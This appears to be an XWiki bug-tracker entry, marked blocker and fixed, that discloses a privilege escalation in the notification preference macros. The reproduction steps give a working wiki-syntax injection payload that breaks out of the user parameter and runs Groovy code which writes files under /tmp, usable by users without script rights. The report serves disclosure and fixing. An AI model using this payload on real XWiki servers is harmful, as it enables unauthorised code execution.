Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
13.2-rc-1
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
Add
{{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}} {{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}} {{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.
Expected result:
No file is created.
Actual result:
A file /tmp/exploit.txt is created with content "created from filter preferences!". Similar files are created for the other macros. This shows privilege escalation to programming rights. The attack can be executed with just an account that permits write access to the user profile or also with just view rights via CKEditor's HTML converter.
Attachments
Issue Links
- is caused by
-
XWIKI-16158 Allow admin to access the notification preferences of other users
- Closed